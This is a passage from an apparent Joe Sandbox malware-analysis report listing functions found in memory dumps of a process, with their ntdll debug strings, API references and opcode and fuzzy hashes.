                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 035C4742
                                                • ExecuteOptions, xrefs: 035C46A0
                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 035C4787
                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 035C4655
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.4129989317.0000000003520000.00000040.00001000.00020000.00000000.sdmp, Offset: 03520000, based on PE: true
                                                • Associated: 00000011.00000002.4129989317.0000000003649000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.4129989317.000000000364D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.4129989317.00000000036BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_3520000_reg.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                • API String ID: 0-484625025
                                                • Opcode ID: 20819fbb7faeba2122de0655d56d3a87ac5e7814a2d0b2363888522e3e4d48a5
                                                • Instruction ID: f1fdd30d3aae621a7a272eb1e7f2dc351fe6fe0f3d52cbf293e0d5dcb5ebe518
                                                • Opcode Fuzzy Hash: 20819fbb7faeba2122de0655d56d3a87ac5e7814a2d0b2363888522e3e4d48a5
                                                • Instruction Fuzzy Hash: 69511735A00319AADF21FFA5FC95FAD77B8BF49304F180499D505BB1B1EB709A41CA90
                                                Function 03626940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.4129989317.0000000003520000.00000040.00001000.00020000.00000000.sdmp, Offset: 03520000, based on PE: true
                                                • Associated: 00000011.00000002.4129989317.0000000003649000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.4129989317.000000000364D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.4129989317.00000000036BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_3520000_reg.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                • Instruction ID: ce116aad0911e084e10b5adc1d2d8f33aa2413ea191b6eb5c2f662bf8f8ebd81
                                                • Opcode Fuzzy Hash: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                • Instruction Fuzzy Hash: B3023274608752AFD704CF18C990A6ABBF5EFC8710F05892DF9899B264DB71E905CF42
                                                Function 0359B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.4129989317.0000000003520000.00000040.00001000.00020000.00000000.sdmp, Offset: 03520000, based on PE: true
                                                • Associated: 00000011.00000002.4129989317.0000000003649000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.4129989317.000000000364D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.4129989317.00000000036BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_3520000_reg.jbxd
                                                Similarity
                                                • API ID: __aulldvrm
                                                • String ID: +$-$0$0
                                                • API String ID: 1302938615-699404926
                                                • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                • Instruction ID: 01fc9bb4a76be31ac64bf7b31ff5d24c4f08b5ef564bdd5e7597735c67284e66
                                                • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                • Instruction Fuzzy Hash: 7F819E74E052499AFF24CF68F8917BEBBB6BF85310F1C469BD851A73A0C73499408B91
                                                Function 036020E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.4129989317.0000000003520000.00000040.00001000.00020000.00000000.sdmp, Offset: 03520000, based on PE: true
                                                • Associated: 00000011.00000002.4129989317.0000000003649000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.4129989317.000000000364D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.4129989317.00000000036BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_3520000_reg.jbxd
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: %%%u$[$]:%u
                                                • API String ID: 48624451-2819853543
                                                • Opcode ID: 2c8052994756359aacfb7b080acea5d8f670b5eecda50bb7bedae14f578c2d5d
                                                • Instruction ID: 006a17787a19bbd6660caf2c748bdde27d2419f3e43336b6a1145b496efb6655
                                                • Opcode Fuzzy Hash: 2c8052994756359aacfb7b080acea5d8f670b5eecda50bb7bedae14f578c2d5d
                                                • Instruction Fuzzy Hash: 6021B27AE00219ABDB14DF79DD55AEFBBF8EF44644F080556EA04E3240E730DA118BA0
                                                Function 03422DF1 Relevance: 7.6, Strings: 6, Instructions: 62COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.4129910472.0000000003420000.00000040.00000800.00020000.00000000.sdmp, Offset: 03420000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_3420000_reg.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: SzXE$U^FB$]TfT$]XZT$rYC^$|^KX
                                                • API String ID: 0-3184614907
                                                • Opcode ID: bbd2849eaa63d1a6eb161249598496b8c2ceab0f527ae7354ed56e852160a3a1
                                                • Instruction ID: 42b47483ad70b9a5298b3b47ea91afae38a6b11b078733f20d83eec0f46fbfcc
                                                • Opcode Fuzzy Hash: bbd2849eaa63d1a6eb161249598496b8c2ceab0f527ae7354ed56e852160a3a1
                                                • Instruction Fuzzy Hash: 292155B041074DDACF24DF84C0046EEBBB1FF18319F81809EE91A6F202D7768699CB85
                                                Function 0357F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                Download Yara Rule
                                                Strings
                                                • RTL: Re-Waiting, xrefs: 035C031E
                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 035C02BD
                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 035C02E7
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.4129989317.0000000003520000.00000040.00001000.00020000.00000000.sdmp, Offset: 03520000, based on PE: true
                                                • Associated: 00000011.00000002.4129989317.0000000003649000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.4129989317.000000000364D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.4129989317.00000000036BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_3520000_reg.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                • API String ID: 0-2474120054
                                                • Opcode ID: b5976197b87d4c31974695129d28f38b7f0bbc37bdbb34f8ce16b0bde1b13105
                                                • Instruction ID: 23951450ead97aa9ec2eb672cfd6d159063cde6df0c1772ceab9afb19d4008f7
                                                • Opcode Fuzzy Hash: b5976197b87d4c31974695129d28f38b7f0bbc37bdbb34f8ce16b0bde1b13105
                                                • Instruction Fuzzy Hash: 6BE1BE34614781DFD724CF68E884B2AB7E0BB84718F180A5DF4A58B2F1D774D844CB82
                                                Function 0358BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                Download Yara Rule
                                                Strings
                                                • RTL: Resource at %p, xrefs: 035C7B8E
                                                • RTL: Re-Waiting, xrefs: 035C7BAC
                                                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 035C7B7F
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.4129989317.0000000003520000.00000040.00001000.00020000.00000000.sdmp, Offset: 03520000, based on PE: true
                                                • Associated: 00000011.00000002.4129989317.0000000003649000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.4129989317.000000000364D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.4129989317.00000000036BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_3520000_reg.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                • API String ID: 0-871070163
                                                • Opcode ID: 2908c0ca484c79d31c3159adbec3c2137eafe77a54cd50d57bf3ea7781ac90f9
                                                • Instruction ID: 13dd0d7b8042446e112b5005bcd4151072273bc1d4c1c057fae87fb4aef06c8e
                                                • Opcode Fuzzy Hash: 2908c0ca484c79d31c3159adbec3c2137eafe77a54cd50d57bf3ea7781ac90f9
                                                • Instruction Fuzzy Hash: 9D41E1353007029FD724EF69E840B2AB7E9FF89714F040A1DF856AB6A0EB70E4058F91
                                                Function 0358B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                Download Yara Rule
                                                APIs
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 035C728C
                                                Strings
                                                • RTL: Resource at %p, xrefs: 035C72A3
                                                • RTL: Re-Waiting, xrefs: 035C72C1
                                                • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 035C7294
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.4129989317.0000000003520000.00000040.00001000.00020000.00000000.sdmp, Offset: 03520000, based on PE: true
                                                • Associated: 00000011.00000002.4129989317.0000000003649000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.4129989317.000000000364D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.4129989317.00000000036BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_3520000_reg.jbxd
                                                Similarity
                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                • API String ID: 885266447-605551621
                                                • Opcode ID: 65369b2e7aaa83cf4519be05b70b25d752ab750504f45eff0f6f877a2a0f704b
                                                • Instruction ID: e6ff4cc2cdce922cfad03e2e7af2bdd7a76e4a7fd807fba0ac3c0dc24b1eb9ac
                                                • Opcode Fuzzy Hash: 65369b2e7aaa83cf4519be05b70b25d752ab750504f45eff0f6f877a2a0f704b
                                                • Instruction Fuzzy Hash: 9E412235700242AFD720DF64EC41F2AB7AAFB88714F180A19F855AB660DB21F8028BD0
                                                Function 03602300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.4129989317.0000000003520000.00000040.00001000.00020000.00000000.sdmp, Offset: 03520000, based on PE: true
                                                • Associated: 00000011.00000002.4129989317.0000000003649000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.4129989317.000000000364D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.4129989317.00000000036BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_3520000_reg.jbxd
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: %%%u$]:%u
                                                • API String ID: 48624451-3050659472
                                                • Opcode ID: af05984b7934f8d80c6a1ad40b727c80d902972a4057f179a2071ed964b6e7a8
                                                • Instruction ID: ad0d29331bc8ac4420df3d1d5617122ad9370a3b6ca78ca3431189ec4722a9ca
                                                • Opcode Fuzzy Hash: af05984b7934f8d80c6a1ad40b727c80d902972a4057f179a2071ed964b6e7a8
                                                • Instruction Fuzzy Hash: C731B876A002199FCB28DF39DD55BEFB7F8FF44600F444456E849D3280EB309A548B60
                                                Function 03597D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.4129989317.0000000003520000.00000040.00001000.00020000.00000000.sdmp, Offset: 03520000, based on PE: true
                                                • Associated: 00000011.00000002.4129989317.0000000003649000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.4129989317.000000000364D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.4129989317.00000000036BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_3520000_reg.jbxd
                                                Similarity
                                                • API ID: __aulldvrm
                                                • String ID: +$-
                                                • API String ID: 1302938615-2137968064
                                                • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                • Instruction ID: 72f4747966f370cb8496a05321a19c383e597a64855c6f2f51be0a985b5a2b2f
                                                • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                • Instruction Fuzzy Hash: B8919370E102169FFF24DF69E8816BEB7B5FF88720F58455BE865A72E0E73099408750
                                                Function 03559126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.4129989317.0000000003520000.00000040.00001000.00020000.00000000.sdmp, Offset: 03520000, based on PE: true
                                                • Associated: 00000011.00000002.4129989317.0000000003649000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.4129989317.000000000364D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.4129989317.00000000036BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_3520000_reg.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $$@
                                                • API String ID: 0-1194432280
                                                • Opcode ID: 90a742baee697aaac641c709b79e41d6bd3be47fa36244c8a1af39390e92a097
                                                • Instruction ID: c075b4c7dffd0f0dae77293331f7bfc9bf771a754c660b2b4d095fd8a1f94ffa
                                                • Opcode Fuzzy Hash: 90a742baee697aaac641c709b79e41d6bd3be47fa36244c8a1af39390e92a097
                                                • Instruction Fuzzy Hash: 6E8129B5D00269DBDB21DF54DC44BEEB7B8BB48750F0445EAA919B7290E7309E84CFA0